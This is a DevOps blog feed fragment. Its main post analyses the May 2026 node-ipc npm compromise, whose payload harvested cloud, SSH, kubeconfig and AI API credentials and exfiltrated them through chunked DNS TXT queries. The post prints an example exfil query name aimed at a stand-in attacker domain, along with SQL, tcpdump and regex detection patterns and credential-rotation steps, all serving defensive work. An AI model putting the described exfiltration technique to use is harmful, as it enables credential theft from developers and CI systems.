          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-why-this-keeps-happening"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>This is the fifth coordinated supply chain campaign we&#39;ve covered in the last six weeks. AntV (Shai-Hulud worm hitting <code>@antv</code> packages and <code>echarts-for-react</code>). TanStack (npm + GitHub Actions cache poisoning + dead-man&#39;s switch). node-ipc (DNS-tunneling credential exfil). The two PyPI / npm Mini-Shai-Hulud waves. Now this one.</p>
<p>The pattern is consistent: attackers are getting better at finding the seam between two systems where the defender&#39;s review process stops. TanStack exploited the seam between forked PRs and trusted CI cache. node-ipc exploited the seam between HTTPS egress controls and DNS resolution. This one exploited the seam between PHP review and JavaScript review on a repo that carries both.</p>
<p>The fix is not another tool. It&#39;s the operational discipline of looking at every manifest, every workflow, every script that runs on your build infrastructure, regardless of what language you think the project is. The teams that get hit are the ones that built their dependency-review process around one language and never thought about what happens when a Composer package ships a <code>package.json</code>.</p>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-summary"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The May 22 Packagist campaign hit 8 packages and 700+ GitHub repos by hiding a <code>postinstall</code> hook in <code>package.json</code> instead of <code>composer.json</code>. PHP review pipelines missed it. The same install command shows up in <code>.github/workflows/ci.yml</code> files under the name &quot;Dependency Cache Sync&quot; as a re-infection vector that survives the package cleanup.</p>
<p>Today&#39;s actions for any team running PHP:</p>
<ul>
<li>Grep every <code>package.json</code> in <code>vendor/</code> and in your own repos for <code>curl ... /tmp/.</code>.</li>
<li>Pin Composer dependencies to tags, not branches.</li>
<li>Add CODEOWNERS protection on <code>package.json</code> install-script changes.</li>
<li>Run a cross-manifest scanner in CI so the next attacker hiding in the other ecosystem&#39;s file gets flagged before merge.</li>
</ul>
<p>Sources: <a href="https://socket.dev/blog/malicious-postinstall-hook-found-across-700-github-repos">Socket&#39;s original disclosure</a>, <a href="https://cybersecuritynews.com/laravel-lang-packages-compromised/">Cybersecurity News coverage of the Laravel-Lang variant</a>, and the Aikido write-up on <a href="https://www.aikido.dev/blog/supply-chain-attack-targets-laravel-lang-packages-with-credential-stealer">Laravel-Lang credential stealer</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[node-ipc DNS-Tunneling Supply Chain Attack: Your Egress Firewall Probably Missed This]]></title>
      <link>https://devops-daily.com/posts/node-ipc-dns-exfil-supply-chain-may-2026</link>
      <description><![CDATA[On May 14, 2026, three malicious versions of the node-ipc npm package shipped a payload that hunts AWS, SSH, kubeconfig, and GitHub CLI credentials, then smuggles them out through DNS TXT queries. Most orgs filter HTTPS egress. Almost nobody filters DNS. Here is what the payload does and how to close the gap.]]></description>
      <pubDate>Fri, 22 May 2026 20:30:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/node-ipc-dns-exfil-supply-chain-may-2026</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Supply Chain]]></category><category><![CDATA[Security]]></category><category><![CDATA[npm]]></category><category><![CDATA[DevOps]]></category><category><![CDATA[CICD]]></category><category><![CDATA[DNS]]></category>
      <content:encoded><![CDATA[<p>On May 14, 2026, three new versions of <code>node-ipc</code> showed up on the npm registry within minutes of each other: <code>9.1.6</code>, <code>9.2.3</code>, and <code>12.0.1</code>. All three carried an identical 80 KB obfuscated payload injected into the package&#39;s CommonJS bundle. Inside that payload was a credential stealer that hunts more than 100 categories of sensitive files and then exfiltrates the spoils through <strong>DNS TXT queries</strong>, not HTTP.</p>
<p>That last detail is the part this post is about. Almost every supply chain post-mortem in the last twelve months ends with the same advice: pin your lockfiles, enable provenance, block outbound traffic to known-bad domains. All good advice. None of it catches an attacker who hides the stolen data inside DNS resolution traffic that your CI runners and developer laptops were going to make anyway.</p>
<p>node-ipc has roughly 822K weekly downloads and is a transitive dependency of a long list of CLI tools and frameworks. If your stack pulls it, even four levels deep, the install-time payload runs as whatever user ran <code>npm install</code>, with whatever cloud, SSH, and Kubernetes credentials that user has access to.</p>
<p>This post is the practical version: what the payload does, why DNS exfil works on most networks, the egress filtering you can ship in an afternoon, and the order to rotate if you ran any of the bad versions.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>Three malicious node-ipc versions: <code>9.1.6</code>, <code>9.2.3</code>, <code>12.0.1</code>, published 2026-05-14. Identical 80 KB payload in each.</li>
<li>Targets: AWS / GCP / Azure tokens, SSH private keys, kubeconfig, <code>.env</code> files, GitHub CLI tokens, Anthropic and OpenAI keys, Bitwarden vaults, and around 90 other credential categories.</li>
<li>Exfil: payload chunks the stolen data, encrypts it, and embeds the ciphertext in DNS TXT lookups to attacker-controlled domains. Every developer machine and CI runner can resolve DNS by default, so the traffic blends in.</li>
<li>Likely vector: maintainer account compromise on npm. The repo on GitHub was clean during the window the bad packages were live.</li>
<li>If you ran a bad version, treat every secret reachable from that machine as burned and rotate in this order: GitHub tokens, cloud STS sessions, long-lived cloud keys, SSH keys, kubeconfig, app secrets.</li>
<li>Hardening: lock CI runners and developer laptops to a small DNS allowlist (your resolver + your DoH provider), log DNS queries, and alert on TXT queries to non-allowlisted domains. None of this needs new tooling.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>Familiarity with <code>npm install</code> and lockfile semantics.</li>
<li>A network where you control the egress path for at least one set of machines (CI runners are the highest-value target).</li>
<li><code>dig</code>, <code>tcpdump</code>, or your cloud&#39;s DNS query logs to verify what the actual baseline of outbound DNS looks like.</li>
</ul>
<h2 id="h2-what-the-payload-actually-does" class="group relative scroll-mt-24">
        <a href="#h2-what-the-payload-actually-does" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What the payload actually does
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-the-payload-actually-does"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>When a project pulls a bad node-ipc version, the malicious CommonJS bundle runs as part of the package&#39;s normal entrypoint. Three things happen, in order.</p>
<p><strong>1. File harvest.</strong> The payload walks <code>$HOME</code>, the working directory, and a handful of well-known config paths looking for credential files. The list includes obvious targets (<code>~/.aws/credentials</code>, <code>~/.config/gcloud/application_default_credentials.json</code>, <code>~/.azure/</code>, <code>~/.ssh/id_*</code>, <code>~/.kube/config</code>) plus a long tail of the things that have leaked in previous Shai-Hulud waves (<code>~/.config/gh/hosts.yml</code>, <code>~/.npmrc</code>, <code>~/.pypirc</code>, <code>.env</code>, <code>.env.local</code>, <code>~/.config/Code/User/settings.json</code> for VS Code Anthropic keys). It also picks up Bitwarden CLI vault paths, Anthropic / OpenAI / Mistral keys from their canonical locations, and the Cursor / Continue.dev config directories.</p>
<p><strong>2. Encryption and chunking.</strong> The harvested blob is encrypted with a key derived from a hardcoded attacker public key (so only they can read it), then base32-encoded and split into chunks small enough to fit inside a DNS label. DNS labels are capped at 63 characters each and the full FQDN at 253 characters, which constrains how much you can stuff into one query. The payload uses sequence prefixes (<code>c00-</code>, <code>c01-</code>, ...) so the attacker&#39;s authoritative server can reassemble.</p>
<p><strong>3. Exfil via DNS TXT lookups.</strong> For each chunk, the payload issues a DNS TXT query for <code>&lt;chunk&gt;.&lt;sequence&gt;.&lt;victim-id&gt;.&lt;attacker-domain&gt;</code>. The OS resolver dutifully forwards the query upstream. Eventually it hits the attacker&#39;s authoritative name server, which logs the query, returns a junk TXT answer, and now has another piece of your <code>~/.aws/credentials</code>.</p>
<p>The clever bit is the resolver hop. The payload itself never opens a socket to the attacker. The OS resolver does, on its behalf, to whatever DNS forwarder you have configured. If your CI runner can resolve <code>npmjs.com</code> to install packages in the first place, it can also resolve <code>&lt;stolen-credentials&gt;.&lt;attacker-domain&gt;</code> without anything looking obviously wrong.</p>
<h2 id="h2-why-most-egress-controls-miss-this" class="group relative scroll-mt-24">
        <a href="#h2-why-most-egress-controls-miss-this" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why most egress controls miss this
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-why-most-egress-controls-miss-this"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Pretty much every &quot;secure your CI&quot; post you have read goes something like: lock down outbound HTTPS to a small allowlist of registries (<code>registry.npmjs.org</code>, your container registry, GitHub) and block everything else. That is a real control. Most network egress filtering at this layer is implemented via a HTTP CONNECT proxy, an AWS Network Firewall rule, or a Cilium L7 policy.</p>
<p>DNS sits underneath all of that. Before any HTTPS connection happens, the runner asks the OS resolver for an A or AAAA record. The OS resolver forwards to whatever was set in <code>/etc/resolv.conf</code>, usually a cloud-provided resolver (AWS at <code>169.254.169.253</code> from within a VPC, or Google at <code>169.254.169.254</code> for GCE). The resolver chases the query out to authoritative servers on the public internet. By the time the runner&#39;s HTTP-egress firewall sees the connection, the DNS query has already happened, and any TXT lookups the payload made along the way are already logged on the attacker&#39;s name server.</p>
<p>So:</p>
<ul>
<li>An L7 HTTPS allowlist does not block this. The exfil never makes an HTTPS connection.</li>
<li>A blanket &quot;block all outbound except 443 to allowlisted domains&quot; rule does not block this. UDP/53 (or TCP/53) to the cloud-provided resolver is needed for <em>any</em> DNS to work, including the legitimate <code>registry.npmjs.org</code> resolution that your build needs.</li>
<li>Even DoH or DoT to your own resolver does not block this if the resolver itself is happy to forward arbitrary public queries.</li>
</ul>
<p>The control you actually need is at the <strong>resolver</strong> layer: an allowlist of domains the resolver is willing to answer for, with everything else returning NXDOMAIN. Or, less drastically, query logging plus an alert on patterns that look like exfil.</p>
<h2 id="h2-detection-spotting-exfil-in-your-dns-logs" class="group relative scroll-mt-24">
        <a href="#h2-detection-spotting-exfil-in-your-dns-logs" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Detection: spotting exfil in your DNS logs
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-detection-spotting-exfil-in-your-dns-logs"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>If you have DNS query logging enabled on your CI runners or developer laptops, this is what to look for.</p>
<p><strong>Long, high-entropy labels.</strong> A legitimate query is <code>registry.npmjs.org</code>. An exfil query is <code>mfqxezlj4qcaij2gmiyc4t3oojxw4y3vnu3wcljom5wsa2ltnbxxmzlroruxg4dpobxw4u3jonxw2zlu.c07.victim42.evilcorp.net</code>. The first label is base32 binary, very long, and uniformly distributed across the alphabet. That is the signal.</p>
<p>A starter detection on AWS Route 53 Resolver query logs in Athena:</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">SELECT</span>
  query_timestamp,
  srcaddr,
  query_name,
  query_type,
  length(query_name) <span class="hljs-keyword">AS</span> qlen
<span class="hljs-keyword">FROM</span> route53_resolver_query_logs
<span class="hljs-keyword">WHERE</span> query_type <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;TXT&#x27;</span>
  <span class="hljs-keyword">AND</span> query_timestamp <span class="hljs-operator">&gt;=</span> <span class="hljs-built_in">current_date</span> <span class="hljs-operator">-</span> <span class="hljs-type">interval</span> <span class="hljs-string">&#x27;1&#x27;</span> <span class="hljs-keyword">day</span>
  <span class="hljs-keyword">AND</span> length(query_name) <span class="hljs-operator">&gt;</span> <span class="hljs-number">80</span>
  <span class="hljs-keyword">AND</span> regexp_like(split_part(query_name, <span class="hljs-string">&#x27;.&#x27;</span>, <span class="hljs-number">1</span>), <span class="hljs-string">&#x27;^[a-z2-7]{50,}$&#x27;</span>)
<span class="hljs-keyword">ORDER</span> <span class="hljs-keyword">BY</span> query_timestamp <span class="hljs-keyword">DESC</span>;
</code></pre><p>That regex matches a 50-plus-character base32 label, which is the signature of chunked binary in the first label. A normal <code>dig +short A ...</code> query never produces a label that long.</p>
<p>On the runner itself, the same idea with <code>tcpdump</code>:</p>
<pre><code class="hljs language-bash"><span class="hljs-built_in">sudo</span> tcpdump -i any -nn -s 0 -A <span class="hljs-string">&#x27;udp port 53&#x27;</span> 2&gt;/dev/null \
  | grep -oE <span class="hljs-string">&#x27;[a-z2-7]{50,}\.[^ ]+&#x27;</span> \
  | <span class="hljs-built_in">sort</span> -u
</code></pre><p>Leave that running for a baseline build and see what shows up. If anything other than the occasional long ARN-like label appears, dig deeper.</p>
<p><strong>Volume of TXT queries.</strong> Most builds make a handful of A/AAAA queries and effectively zero TXT queries. A build that produces hundreds of TXT queries to the same parent domain is the loud version of the same signal.</p>
<pre><code class="hljs language-sql"><span class="hljs-keyword">SELECT</span>
  regexp_extract(query_name, <span class="hljs-string">&#x27;\.([^.]+\.[^.]+)$&#x27;</span>, <span class="hljs-number">1</span>) <span class="hljs-keyword">AS</span> parent_domain,
  <span class="hljs-built_in">count</span>(<span class="hljs-operator">*</span>) <span class="hljs-keyword">AS</span> txt_queries
<span class="hljs-keyword">FROM</span> route53_resolver_query_logs
<span class="hljs-keyword">WHERE</span> query_type <span class="hljs-operator">=</span> <span class="hljs-string">&#x27;TXT&#x27;</span>
  <span class="hljs-keyword">AND</span> query_timestamp <span class="hljs-operator">&gt;=</span> <span class="hljs-built_in">current_timestamp</span> <span class="hljs-operator">-</span> <span class="hljs-type">interval</span> <span class="hljs-string">&#x27;1&#x27;</span> <span class="hljs-keyword">hour</span>
<span class="hljs-keyword">GROUP</span> <span class="hljs-keyword">BY</span> <span class="hljs-number">1</span>
<span class="hljs-keyword">HAVING</span> <span class="hljs-built_in">count</span>(<span class="hljs-operator">*</span>) <span class="hljs-operator">&gt;</span> <span class="hljs-number">50</span>
<span class="hljs-keyword">ORDER</span> <span class="hljs-keyword">BY</span> <span class="hljs-number">2</span> <span class="hljs-keyword">DESC</span>;
</code></pre><p>50 TXT queries per hour to a single parent domain is well above baseline for normal traffic. Tune the threshold once you have a week of baseline data.</p>
<h2 id="h2-prevention-a-small-dns-allowlist-for-ci" class="group relative scroll-mt-24">
        <a href="#h2-prevention-a-small-dns-allowlist-for-ci" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prevention: a small DNS allowlist for CI
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prevention-a-small-dns-allowlist-for-ci"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The strongest control is to give your CI runners a resolver that only answers for domains you want to resolve. Everything else gets NXDOMAIN, and the exfil dies at the resolver.</p>
<p>A minimal CoreDNS config that allowlists npm, GitHub, your container registry, and your cloud provider:</p>
<pre><code class="hljs language-text"># /etc/coredns/Corefile
. {
    template ANY ANY . {
        rcode NXDOMAIN
    }
}

registry.npmjs.org github.com codeload.github.com objects.githubusercontent.com {
    forward . 1.1.1.1 8.8.8.8
    cache 30
    log
}

.ecr.us-east-1.amazonaws.com .s3.us-east-1.amazonaws.com .sts.amazonaws.com {
    forward . 169.254.169.253
    cache 30
    log
}
</code></pre><p>Point your CI runner&#39;s <code>/etc/resolv.conf</code> at this CoreDNS instance instead of the cloud-provided one. Now an <code>npm install</code> of a clean package works. An <code>npm install</code> that pulls a bad node-ipc still runs the install hook, but every TXT query the payload issues comes back NXDOMAIN, and your CoreDNS log has the full record of which domain the payload tried to reach.</p>
<p>Two caveats:</p>
<ol>
<li><strong>The allowlist is real work.</strong> You have to enumerate every domain your builds legitimately query. Expect surprises: the AWS SDK queries STS endpoints by region, GitHub Actions queries a different set of CDN domains depending on what&#39;s being downloaded, Docker queries authentication endpoints by image registry. Spend a day in audit-only mode (log everything, NXDOMAIN nothing) before you flip the switch.</li>
<li><strong>DoH inside the runtime breaks this.</strong> If your application or a build tool resolves DNS through DoH directly to <code>1.1.1.1</code>, your CoreDNS allowlist never sees the query. Block outbound TCP/443 to known public DoH endpoints (<code>1.1.1.1</code>, <code>8.8.8.8</code>, <code>9.9.9.9</code>, <code>1.0.0.1</code>) from runners as a backstop.</li>
</ol>
<p>For developer laptops the equivalent is your endpoint protection or DNS-filtering provider (Cloudflare Gateway, NextDNS, Pi-hole on your home network). The Cloudflare Gateway policy is one line:</p>
<pre><code class="hljs language-text">Action: Block
DNS query type matches: TXT
DNS domain matches regex: ^[a-z2-7]{50,}\.
</code></pre><p>That blocks the exact label shape this payload generates without breaking any legitimate query.</p>
<h2 id="h2-if-you-ran-a-bad-version" class="group relative scroll-mt-24">
        <a href="#h2-if-you-ran-a-bad-version" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          If you ran a bad version
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-if-you-ran-a-bad-version"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The rotation order matters because some tokens can sign other tokens. Do this top-to-bottom on the affected machine and on anything that machine logged into in the last week.</p>
<ol>
<li><strong>GitHub tokens.</strong> <code>gh auth logout</code>, then go to <a href="https://github.com/settings/tokens">https://github.com/settings/tokens</a> and revoke every PAT. Reissue with the minimum scope you actually need. Revoking GH tokens first prevents the attacker from pushing malicious commits to your repos using stolen credentials.</li>
<li><strong>Cloud STS sessions.</strong> Force-expire all active sessions: AWS <code>aws sts get-caller-identity</code> to find the role, then revoke session via console or <code>aws iam put-user-policy</code> denying everything. GCP <code>gcloud auth revoke --all</code>. Azure <code>az logout &amp;&amp; az account clear</code>.</li>
<li><strong>Long-lived cloud keys.</strong> Rotate AWS access keys, GCP service-account JSON keys, Azure SP credentials. Yes, even if you &quot;only had the keys for testing&quot;.</li>
<li><strong>SSH keys.</strong> Reissue keypairs. Remove the public key of the compromised machine from every <code>authorized_keys</code> it landed on, including GitHub, GitLab, your jump host, and any cloud VM you SSH&#39;d into.</li>
<li><strong>Kubeconfig.</strong> Rotate the cluster CA-signed certs for the user. For EKS / GKE / AKS this is &quot;remove the IAM principal from <code>aws-auth</code> and re-add&quot;, &quot;remove the GCP IAM binding and re-add&quot;, &quot;remove the Azure RBAC role assignment and re-add&quot; respectively.</li>
<li><strong>App secrets.</strong> Anything in <code>.env</code> that the payload read: API keys, database passwords, Stripe keys, Sentry DSNs, observability tokens. Rotate the lot.</li>
<li><strong>AI tool keys.</strong> Anthropic, OpenAI, Mistral, Cursor, Continue.dev. These were explicit targets in this payload.</li>
</ol>
<p>While you&#39;re rotating, also run a <code>git log --since=&quot;2026-05-14&quot; --author=&lt;your-email&gt;</code> on every repo you have push access to. The attacker&#39;s first move with a stolen GH token is usually a commit to a repo you maintain, either as a worm-propagation step or as the next pivot. If anything in that log looks unfamiliar, force-push the previous good HEAD and rotate the token before the new one runs the worm again.</p>
<h2 id="h2-why-this-matters-beyond-node-ipc" class="group relative scroll-mt-24">
        <a href="#h2-why-this-matters-beyond-node-ipc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why this matters beyond node-ipc
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-why-this-matters-beyond-node-ipc"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The node-ipc payload is the third major npm credential stealer this month. TanStack on May 11, AntV / <code>echarts-for-react</code> on May 19, node-ipc on May 14, plus the broader Shai-Hulud campaign behind a chunk of these. All three of those campaigns used HTTP POST to attacker domains for exfil. node-ipc is the first one I have seen in the wild use DNS at scale, and the technique works because the average DevOps egress story stops at HTTPS.</p>
<p>If you only take one thing from this post, it&#39;s that <strong>DNS is a control plane your firewall does not look at</strong>. Treat it like one. Log it, allowlist it on the high-value machines (CI runners, anything with cloud admin creds, build servers), and put the same kind of alert on weird DNS patterns that you already have on weird HTTPS patterns. Most teams have spent the last six months adding lockfile pinning and provenance verification. That&#39;s necessary. It is not sufficient. The attackers have already moved one layer down.</p>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-summary"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The May 14 node-ipc compromise is small in absolute numbers (three versions, 822K weekly downloads), but big in what it demonstrates. A credential stealer that exfils via DNS TXT queries bypasses the HTTPS egress controls almost every team relies on. The defense is a resolver-layer allowlist, query logging with alerting on high-entropy labels, and treating DNS as part of your egress posture instead of an invisible service that just works.</p>
<p>If you ran any of <code>node-ipc@9.1.6</code>, <code>node-ipc@9.2.3</code>, or <code>node-ipc@12.0.1</code> between May 14 and now, treat the machine as compromised and walk the rotation list above. Then add a DNS allowlist to your CI runners before the next wave teaches everyone the same lesson the hard way.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[AI Is Reshaping DevOps. The Engineers Are Faster Than the Vendors.]]></title>
      <link>https://devops-daily.com/posts/ai-reshaping-devops-engineers-vs-vendors</link>
      <description><![CDATA[GitHub, Datadog, HashiCorp and friends are moving carefully. The engineers running their stacks are wiring AI into kubectl and pull-request review on a Tuesday afternoon. Here is what is actually changing in 2026, what is not, and where the gap between vendors and the engineers using their tools is widest.]]></description>
      <pubDate>Wed, 20 May 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/ai-reshaping-devops-engineers-vs-vendors</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[DevOps]]></category><category><![CDATA[AI]]></category><category><![CDATA[AIOps]]></category><category><![CDATA[Automation]]></category><category><![CDATA[Developer Tools]]></category>
      <content:encoded><![CDATA[<p>A question gets asked in every DevOps Slack channel right now: how will AI change our work? The honest answer is that no one knows the final shape yet. What we can say with confidence is who is moving faster. It is not the dominant vendors. GitHub, HashiCorp, Datadog, and Red Hat are being careful, because they have customers to keep and revenue to defend, and a wrong AI bet would cost them years. Meanwhile, individual engineers are wiring Claude Code into their kubectl wrappers, training small models on their own incident postmortems, and shipping internal pull-request review agents to teams of five. The Reddit thread that prompted this post is a fair sample of the energy: working engineers trying things, sharing what works, and being honest about what does not.</p>
<p>This post is a working snapshot of where AI is actually changing DevOps in May 2026. What you can use today, what the incumbents are doing, what the engineers running real stacks are doing that the incumbents are not, and which corners are still pure hype.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        <button 
